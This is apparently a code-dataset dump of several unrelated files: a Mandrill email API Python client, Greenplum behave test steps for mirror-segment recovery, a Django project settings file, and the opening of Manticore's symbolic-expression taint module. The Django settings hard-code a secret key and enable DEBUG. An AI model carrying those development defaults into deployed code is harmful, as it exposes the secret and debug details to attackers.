cname.valid_after (string): when the domain's CNAME record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
cname.error (string): an error describing the CNAME record, or null if the record is correct
valid_tracking (boolean): whether this domain can be used as a tracking domain for email.
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownTrackingDomainError: The provided tracking domain does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('urls/check-tracking-domain', _params)
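# A tracking-domain sketch (hypothetical domain; add it, then poll its CNAME
# status):
#
#   client.urls.add_tracking_domain('track.example.com')
#   status = client.urls.check_tracking_domain('track.example.com')
#   print(status['cname']['valid'])   # False until the CNAME propagates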
class Webhooks(object):
def __init__(self, master):
self.master = master
def list(self):
"""Get the list of all webhooks defined on the account
Returns:
array. the webhooks associated with the account::
[] (struct): the individual webhook info::
[].id (integer): a unique integer identifier for the webhook
[].url (string): The URL that the event data will be posted to
[].description (string): a description of the webhook
[].auth_key (string): the key used to sign requests for this webhook
[].events (array): The message events that will be posted to the hook::
[].events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
[].created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
[].batches_sent (integer): the number of event batches that have ever been sent to this webhook
[].events_sent (integer): the total number of events that have ever been sent to this webhook
[].last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('webhooks/list', _params)
def add(self, url, description=None, events=[]):
"""Add a new webhook
Args:
url (string): the URL to POST batches of events
description (string): an optional description of the webhook
events (array): an optional list of events that will be posted to the webhook::
events[] (string): the individual event to listen for
Returns:
struct. the information saved about the new webhook::
id (integer): a unique integer identifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to sign requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'url': url, 'description': description, 'events': events}
return self.master.call('webhooks/add', _params)
def info(self, id):
"""Given the ID of an existing webhook, return the data about it
Args:
id (integer): the unique identifier of a webhook belonging to this account
Returns:
struct. the information about the webhook::
id (integer): a unique integer identifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to sign requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownWebhookError: The requested webhook does not exist
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('webhooks/info', _params)
def update(self, id, url, description=None, events=[]):
"""Update an existing webhook
Args:
id (integer): the unique identifier of a webhook belonging to this account
url (string): the URL to POST batches of events
description (string): an optional description of the webhook
events (array): an optional list of events that will be posted to the webhook::
events[] (string): the individual event to listen for
Returns:
struct. the information for the updated webhook::
id (integer): a unique integer identifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to sign requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownWebhookError: The requested webhook does not exist
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'url': url, 'description': description, 'events': events}
return self.master.call('webhooks/update', _params)
def delete(self, id):
"""Delete an existing webhook
Args:
id (integer): the unique identifier of a webhook belonging to this account
Returns:
struct. the information for the deleted webhook::
id (integer): a unique integer identifier for the webhook
url (string): The URL that the event data will be posted to
description (string): a description of the webhook
auth_key (string): the key used to sign requests for this webhook
events (array): The message events that will be posted to the hook::
events[] (string): the individual message event (send, hard_bounce, soft_bounce, open, click, spam, unsub, or reject)
created_at (string): the date and time that the webhook was created as a UTC string in YYYY-MM-DD HH:MM:SS format
last_sent_at (string): the date and time that the webhook last successfully received events as a UTC string in YYYY-MM-DD HH:MM:SS format
batches_sent (integer): the number of event batches that have ever been sent to this webhook
events_sent (integer): the total number of events that have ever been sent to this webhook
last_error (string): if we've ever gotten an error trying to post to this webhook, the last error that we've seen
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownWebhookError: The requested webhook does not exist
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('webhooks/delete', _params)
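# A webhook lifecycle sketch (hypothetical URL; assumes `client.webhooks`):
#
#   hook = client.webhooks.add('https://example.com/mandrill-hook',
#                              description='bounce tracker',
#                              events=['hard_bounce', 'soft_bounce'])
#   client.webhooks.update(hook['id'], hook['url'],
#                          events=['hard_bounce', 'soft_bounce', 'reject'])
#   client.webhooks.delete(hook['id'])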
class Senders(object):
def __init__(self, master):
self.master = master
def list(self):
"""Return the senders that have tried to use this account.
Returns:
array. an array of sender data, one for each sending address used by the account::
[] (struct): the information on each sending address in the account::
[].address (string): the sender's email address
[].created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the total number of messages sent by this sender
[].hard_bounces (integer): the total number of hard bounces for messages by this sender
[].soft_bounces (integer): the total number of soft bounces for messages by this sender
[].rejects (integer): the total number of rejected messages by this sender
[].complaints (integer): the total number of spam complaints received for messages by this sender
[].unsubs (integer): the total number of unsubscribe requests received for messages by this sender
[].opens (integer): the total number of times messages by this sender have been opened
[].clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
[].unique_opens (integer): the number of unique opens for emails sent for this sender
[].unique_clicks (integer): the number of unique clicks for emails sent for this sender
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('senders/list', _params)
def domains(self, ):
"""Returns the sender domains that have been added to this account.
Returns:
array. an array of sender domain data, one for each sending domain used by the account::
[] (struct): the information on each sending domain for the account::
[].domain (string): the sender domain name
[].created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format
[].last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
[].spf (struct): details about the domain's SPF record::
[].spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill
[].spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
[].spf.error (string): an error describing the spf record, or null if the record is correct
[].dkim (struct): details about the domain's DKIM record::
[].dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill
[].dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
[].dkim.error (string): an error describing the DKIM record, or null if the record is correct
[].verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format
[].valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('senders/domains', _params)
def add_domain(self, domain):
"""Adds a sender domain to your account. Sender domains are added automatically as you
send, but you can use this call to add them ahead of time.
Args:
domain (string): a domain name
Returns:
struct. information about the domain::
domain (string): the sender domain name
created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
spf (struct): details about the domain's SPF record::
spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill
spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
spf.error (string): an error describing the spf record, or null if the record is correct
dkim (struct): details about the domain's DKIM record::
dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill
dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
dkim.error (string): an error describing the DKIM record, or null if the record is correct
verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('senders/add-domain', _params)
def check_domain(self, domain):
"""Checks the SPF and DKIM settings for a domain. If you haven't already added this domain to your
account, it will be added automatically.
Args:
domain (string): a domain name
Returns:
struct. information about the sender domain::
domain (string): the sender domain name
created_at (string): the date and time that the sending domain was first seen as a UTC string in YYYY-MM-DD HH:MM:SS format
last_tested_at (string): when the domain's DNS settings were last tested as a UTC string in YYYY-MM-DD HH:MM:SS format
spf (struct): details about the domain's SPF record::
spf.valid (boolean): whether the domain's SPF record is valid for use with Mandrill
spf.valid_after (string): when the domain's SPF record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
spf.error (string): an error describing the spf record, or null if the record is correct
dkim (struct): details about the domain's DKIM record::
dkim.valid (boolean): whether the domain's DKIM record is valid for use with Mandrill
dkim.valid_after (string): when the domain's DKIM record will be considered valid for use with Mandrill as a UTC string in YYYY-MM-DD HH:MM:SS format. If set, this indicates that the record is valid now, but was previously invalid, and Mandrill will wait until the record's TTL elapses to start using it.
dkim.error (string): an error describing the DKIM record, or null if the record is correct
verified_at (string): if the domain has been verified, this indicates when that verification occurred as a UTC string in YYYY-MM-DD HH:MM:SS format
valid_signing (boolean): whether this domain can be used to authenticate mail, either for itself or as a custom signing domain. If this is false but spf and dkim are both valid, you will need to verify the domain before using it to authenticate mail
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain}
return self.master.call('senders/check-domain', _params)
def verify_domain(self, domain, mailbox):
"""Sends a verification email in order to verify ownership of a domain.
Domain verification is an optional step to confirm ownership of a domain. Once a
domain has been verified in a Mandrill account, other accounts may not have their
messages signed by that domain unless they also verify the domain. This prevents
other Mandrill accounts from sending mail signed by your domain.
Args:
domain (string): a domain name at which you can receive email
mailbox (string): a mailbox at the domain where the verification email should be sent
Returns:
struct. information about the verification that was sent::
status (string): "sent" indicates that the verification has been sent, "already_verified" indicates that the domain has already been verified with your account
domain (string): the domain name you provided
email (string): the email address the verification email was sent to
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'domain': domain, 'mailbox': mailbox}
return self.master.call('senders/verify-domain', _params)
def info(self, address):
"""Return more detailed information about a single sender, including aggregates of recent stats
Args:
address (string): the email address of the sender
Returns:
struct. the detailed information on the sender::
address (string): the sender's email address
created_at (string): the date and time that the sender was first seen by Mandrill as a UTC date string in YYYY-MM-DD HH:MM:SS format
sent (integer): the total number of messages sent by this sender
hard_bounces (integer): the total number of hard bounces by messages by this sender
soft_bounces (integer): the total number of soft bounces by messages by this sender
rejects (integer): the total number of rejected messages by this sender
complaints (integer): the total number of spam complaints received for messages by this sender
unsubs (integer): the total number of unsubscribe requests received for messages by this sender
opens (integer): the total number of times messages by this sender have been opened
clicks (integer): the total number of times tracked URLs in messages by this sender have been clicked
stats (struct): an aggregate summary of the sender's sending stats::
stats.today (struct): stats for this sender so far today::
stats.today.sent (integer): the number of emails sent for this sender so far today
stats.today.hard_bounces (integer): the number of emails hard bounced for this sender so far today
stats.today.soft_bounces (integer): the number of emails soft bounced for this sender so far today
stats.today.rejects (integer): the number of emails rejected for sending this sender so far today
stats.today.complaints (integer): the number of spam complaints for this sender so far today
stats.today.unsubs (integer): the number of unsubscribes for this sender so far today
stats.today.opens (integer): the number of times emails have been opened for this sender so far today
stats.today.unique_opens (integer): the number of unique opens for emails sent for this sender so far today
stats.today.clicks (integer): the number of URLs that have been clicked for this sender so far today
stats.today.unique_clicks (integer): the number of unique clicks for emails sent for this sender so far today
stats.last_7_days (struct): stats for this sender in the last 7 days::
stats.last_7_days.sent (integer): the number of emails sent for this sender in the last 7 days
stats.last_7_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 7 days
stats.last_7_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 7 days
stats.last_7_days.rejects (integer): the number of emails rejected for sending this sender in the last 7 days
stats.last_7_days.complaints (integer): the number of spam complaints for this sender in the last 7 days
stats.last_7_days.unsubs (integer): the number of unsubscribes for this sender in the last 7 days
stats.last_7_days.opens (integer): the number of times emails have been opened for this sender in the last 7 days
stats.last_7_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 7 days
stats.last_7_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 7 days
stats.last_7_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 7 days
stats.last_30_days (struct): stats for this sender in the last 30 days::
stats.last_30_days.sent (integer): the number of emails sent for this sender in the last 30 days
stats.last_30_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 30 days
stats.last_30_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 30 days
stats.last_30_days.rejects (integer): the number of emails rejected for sending this sender in the last 30 days
stats.last_30_days.complaints (integer): the number of spam complaints for this sender in the last 30 days
stats.last_30_days.unsubs (integer): the number of unsubscribes for this sender in the last 30 days
stats.last_30_days.opens (integer): the number of times emails have been opened for this sender in the last 30 days
stats.last_30_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 30 days
stats.last_30_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 30 days
stats.last_30_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 30 days
stats.last_60_days (struct): stats for this sender in the last 60 days::
stats.last_60_days.sent (integer): the number of emails sent for this sender in the last 60 days
stats.last_60_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 60 days
stats.last_60_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 60 days
stats.last_60_days.rejects (integer): the number of emails rejected for sending this sender in the last 60 days
stats.last_60_days.complaints (integer): the number of spam complaints for this sender in the last 60 days
stats.last_60_days.unsubs (integer): the number of unsubscribes for this sender in the last 60 days
stats.last_60_days.opens (integer): the number of times emails have been opened for this sender in the last 60 days
stats.last_60_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 60 days
stats.last_60_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 60 days
stats.last_60_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 60 days
stats.last_90_days (struct): stats for this sender in the last 90 days::
stats.last_90_days.sent (integer): the number of emails sent for this sender in the last 90 days
stats.last_90_days.hard_bounces (integer): the number of emails hard bounced for this sender in the last 90 days
stats.last_90_days.soft_bounces (integer): the number of emails soft bounced for this sender in the last 90 days
stats.last_90_days.rejects (integer): the number of emails rejected for sending this sender in the last 90 days
stats.last_90_days.complaints (integer): the number of spam complaints for this sender in the last 90 days
stats.last_90_days.unsubs (integer): the number of unsubscribes for this sender in the last 90 days
stats.last_90_days.opens (integer): the number of times emails have been opened for this sender in the last 90 days
stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent for this sender in the last 90 days
stats.last_90_days.clicks (integer): the number of URLs that have been clicked for this sender in the last 90 days
stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent for this sender in the last 90 days
Raises:
UnknownSenderError: The requested sender does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'address': address}
return self.master.call('senders/info', _params)
def time_series(self, address):
"""Return the recent history (hourly stats for the last 30 days) for a sender
Args:
address (string): the email address of the sender
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
UnknownSenderError: The requested sender does not exist
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'address': address}
return self.master.call('senders/time-series', _params)
class Metadata(object):
def __init__(self, master):
self.master = master
def list(self, ):
"""Get the list of custom metadata fields indexed for the account.
Returns:
array. the custom metadata fields for the account::
[] (struct): the individual custom metadata field info::
[].name (string): the unique identifier of the metadata field to update
[].state (string): the current state of the metadata field, one of "active", "delete", or "index"
[].view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('metadata/list', _params)
def add(self, name, view_template=None):
"""Add a new custom metadata field to be indexed for the account.
Args:
name (string): a unique identifier for the metadata field
view_template (string): optional Mustache template to control how the metadata is rendered in your activity log
Returns:
struct. the information saved about the new metadata field::
name (string): the unique identifier of the metadata field to update
state (string): the current state of the metadata field, one of "active", "delete", or "index"
view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
MetadataFieldLimitError: Custom metadata field limit reached.
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'view_template': view_template}
return self.master.call('metadata/add', _params)
def update(self, name, view_template):
"""Update an existing custom metadata field.
Args:
name (string): the unique identifier of the metadata field to update
view_template (string): optional Mustache template to control how the metadata is rendered in your activity log
Returns:
struct. the information for the updated metadata field::
name (string): the unique identifier of the metadata field to update
state (string): the current state of the metadata field, one of "active", "delete", or "index"
view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMetadataFieldError: The provided metadata field name does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'name': name, 'view_template': view_template}
return self.master.call('metadata/update', _params)
def delete(self, name):
"""Delete an existing custom metadata field. Deletion isn't instataneous, and /metadata/list will continue to return the field until the asynchronous deletion process is complete.
Args:
name (string): the unique identifier of the metadata field to update
Returns:
struct. the information for the deleted metadata field::
name (string): the unique identifier of the metadata field to update
state (string): the current state of the metadata field, one of "active", "delete", or "index"
view_template (string): Mustache template to control how the metadata is rendered in your activity log
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMetadataFieldError: The provided metadata field name does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'name': name}
return self.master.call('metadata/delete', _params)
| gpl-2.0 | 7,916,167,334,964,486,000 | 63.208096 | 452 | 0.644558 | false | 4.67285 | false | false | false |
atris/gpdb | gpMgmt/bin/gppylib/test/behave/mgmt_utils/steps/recoverseg_mgmt_utils.py | 6 | 2601 | from gppylib.commands.base import Command, ExecutionError, REMOTE, WorkerPool
from gppylib.db import dbconn
from gppylib.gparray import GpArray
from gppylib.test.behave_utils.utils import run_gpcommand, getRows
import platform
from behave import given, when, then
@given('the information of a "{seg}" segment on a remote host is saved')
@when('the information of a "{seg}" segment on a remote host is saved')
@then('the information of a "{seg}" segment on a remote host is saved')
def impl(context, seg):
if seg == "mirror":
gparray = GpArray.initFromCatalog(dbconn.DbURL())
mirror_segs = [seg for seg in gparray.getDbList() if seg.isSegmentMirror() and seg.getSegmentHostName() != platform.node()]
context.remote_mirror_segdbId = mirror_segs[0].getSegmentDbId()
context.remote_mirror_segdbname = mirror_segs[0].getSegmentHostName()
context.remote_mirror_datadir = mirror_segs[0].getSegmentDataDirectory()
@given('user runs the command "{cmd}" with the saved mirror segment option')
@when('user runs the command "{cmd}" with the saved mirror segment option')
@then('user runs the command "{cmd}" with the saved mirror segment option')
def impl(context, cmd):
cmdStr = '%s -s %s' % (cmd, int(context.remote_mirror_segdbId))
cmd=Command(name='user command', cmdStr=cmdStr)
cmd.run(validateAfter=True)
@given('the saved mirror segment process is still running on that host')
@when('the saved mirror segment process is still running on that host')
@then('the saved mirror segment process is still running on that host')
def impl(context):
cmd = """ps ux | grep "/bin/postgres \-D %s " | grep -v grep""" % (context.remote_mirror_datadir)
cmd=Command(name='user command', cmdStr=cmd, ctxt=REMOTE, remoteHost=context.remote_mirror_segdbname)
cmd.run(validateAfter=True)
res = cmd.get_results()
if not res.stdout.strip():
raise Exception('Mirror segment "%s" not active on "%s"' % (context.remote_mirror_datadir, context.remote_mirror_segdbname))
@given('the saved mirror segment is marked down in config')
@when('the saved mirror segment is marked down in config')
@then('the saved mirror segment is marked down in config')
def impl(context):
qry = """select count(*) from gp_segment_configuration where status='d' and hostname='%s' and dbid=%s""" % (context.remote_mirror_segdbname, context.remote_mirror_segdbId)
row_count = getRows('template1', qry)[0][0]
if row_count != 1:
        raise Exception('Expected mirror segment %s on host %s to be marked down in gp_segment_configuration, but it is not.' % (context.remote_mirror_datadir, context.remote_mirror_segdbname))
| apache-2.0 | -1,428,855,693,660,359,200 | 58.113636 | 175 | 0.720108 | false | 3.592541 | false | false | false |
kurji/lojban_website_mockup | jbobau/jbobau/settings.py | 1 | 3110 | """
Django settings for jbobau project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm#8yqn^1gq&*879+o)e#k2ixg3)_bhv(i@j53g$*ay-tu6p&h%'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'home',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'jbobau.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'jbobau.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
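# The values above are development defaults. As an illustrative sketch only
# (the environment variable names below are assumptions, not part of this
# project), a production deployment would typically pull secrets and hosts
# from the environment instead of hard-coding them:
#
#   SECRET_KEY = os.environ['DJANGO_SECRET_KEY']
#   DEBUG = False
#   ALLOWED_HOSTS = os.environ.get('DJANGO_ALLOWED_HOSTS', '').split(',')
#
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/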
| gpl-3.0 | 7,384,730,629,264,512,000 | 24.284553 | 91 | 0.683923 | false | 3.463252 | false | false | false |
montyly/manticore | manticore/core/smtlib/expression.py | 1 | 36789 | from functools import reduce
from ...exceptions import SmtlibError
import uuid
import re
import copy
from typing import Union, Type, Optional, Dict, Any
class ExpressionException(SmtlibError):
"""
Expression exception
"""
pass
class Expression:
""" Abstract taintable Expression. """
def __init__(self, taint: Union[tuple, frozenset] = ()):
if self.__class__ is Expression:
raise TypeError
super().__init__()
self._taint = frozenset(taint)
def __repr__(self):
return "<{:s} at {:x}{:s}>".format(type(self).__name__, id(self), self.taint and "-T" or "")
@property
def is_tainted(self):
return len(self._taint) != 0
@property
def taint(self):
return self._taint
def issymbolic(value) -> bool:
"""
    Helper to determine whether an object is symbolic (e.g. checking
if data read from memory is symbolic)
:param object value: object to check
:return: whether `value` is symbolic
:rtype: bool
"""
return isinstance(value, Expression)
def istainted(arg, taint=None):
"""
    Helper to determine whether an object is tainted.
    :param arg: a value or Expression
    :param taint: a regular expression matching a taint value (e.g. 'IMPORTANT.*'). If None, this function checks for any taint value.
"""
if not issymbolic(arg):
return False
if taint is None:
return len(arg.taint) != 0
for arg_taint in arg.taint:
m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE)
if m:
return True
return False
def get_taints(arg, taint=None):
"""
    Helper to list an object's taints.
    :param arg: a value or Expression
    :param taint: a regular expression matching a taint value (e.g. 'IMPORTANT.*'). If None, this function lists all taint values.
"""
if not issymbolic(arg):
return
for arg_taint in arg.taint:
if taint is not None:
m = re.match(taint, arg_taint, re.DOTALL | re.IGNORECASE)
if m:
yield arg_taint
else:
yield arg_taint
return
def taint_with(arg, *taints, value_bits=256, index_bits=256):
"""
    Helper to taint a value.
    :param arg: a value or Expression
    :param taints: one or more taint labels to attach to the value (e.g. 'IMPORTANT')
    :param value_bits: bit width used when lifting a concrete int into a BitVecConstant
"""
tainted_fset = frozenset(tuple(taints))
if not issymbolic(arg):
if isinstance(arg, int):
arg = BitVecConstant(value_bits, arg)
arg._taint = tainted_fset
else:
raise ValueError("type not supported")
else:
if isinstance(arg, BitVecVariable):
arg = arg + BitVecConstant(value_bits, 0, taint=tainted_fset)
else:
arg = copy.copy(arg)
arg._taint |= tainted_fset
return arg
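# A minimal usage sketch of the taint helpers above (illustrative only; the
# concrete values and the "IMPORTANT" label are assumptions):
def _example_taint_usage():
    # Wrap a concrete integer into a tainted 256-bit constant.
    x = taint_with(0x41, "IMPORTANT", value_bits=256)
    assert issymbolic(x)  # it is now an Expression
    assert istainted(x, "IMPORTANT.*")  # taints match by regular expression
    assert list(get_taints(x)) == ["IMPORTANT"]
    # Taints propagate through operations via Operation.__init__.
    y = x + BitVecConstant(256, 1)
    assert istainted(y, "IMPORTANT")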
class Variable(Expression):
def __init__(self, name: str, *args, **kwargs):
if self.__class__ is Variable:
raise TypeError
assert " " not in name
super().__init__(*args, **kwargs)
self._name = name
@property
def declaration(self):
pass
@property
def name(self):
return self._name
def __copy__(self, memo):
raise ExpressionException("Copying of Variables is not allowed.")
def __deepcopy__(self, memo):
raise ExpressionException("Copying of Variables is not allowed.")
def __repr__(self):
return "<{:s}({:s}) at {:x}>".format(type(self).__name__, self.name, id(self))
class Constant(Expression):
def __init__(self, value: Union[bool, int], *args, **kwargs):
if self.__class__ is Constant:
raise TypeError
super().__init__(*args, **kwargs)
self._value = value
@property
def value(self):
return self._value
class Operation(Expression):
def __init__(self, *operands, **kwargs):
if self.__class__ is Operation:
raise TypeError
# assert len(operands) > 0
